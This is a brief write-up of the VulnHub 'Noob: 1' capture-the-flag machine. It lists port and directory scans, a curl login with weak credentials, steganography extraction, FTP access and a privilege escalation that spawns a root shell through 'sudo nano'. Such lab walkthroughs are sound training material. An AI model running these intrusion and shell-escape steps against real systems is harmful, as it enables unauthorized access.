Write up

Name: VulnHub | Noob: 1
Writer: 0x64azana
Genre: Enumeration

NMAP-RESULTS:

21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
55077/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

SUBDIR-ENUMS:

N/A

DIR-ENUMERATIONS:

/go.php (Status: 200) [Size: 0]
/index.php (Status: 302) [Size: 0] [--> index.html]
/logout.php (Status: 302) [Size: 0] [--> index.html]
/server-status (Status: 403) [Size: 278]

Exploitation:

1. curl -c cookies.txt -d "username=champ&password=password" -X POST http://192.168.2.253/go.php && curl -b cookies.txt -O http://192.168.2.253/downloads.rar
2. unrar e downloads.rar
3. steghide extract -sf funny.bmp -p sudo
4. cat user.txt
5. rot13 user.txt
6. ftp wtf@192.168.2.253
7. > this one is a simple one

PRIV-ESC:

# AS N00B[wtf] THROUGH SSH
sudo nano
^R^X
reset; sh 1>&0 2>&0

Hope you enjoyed the read!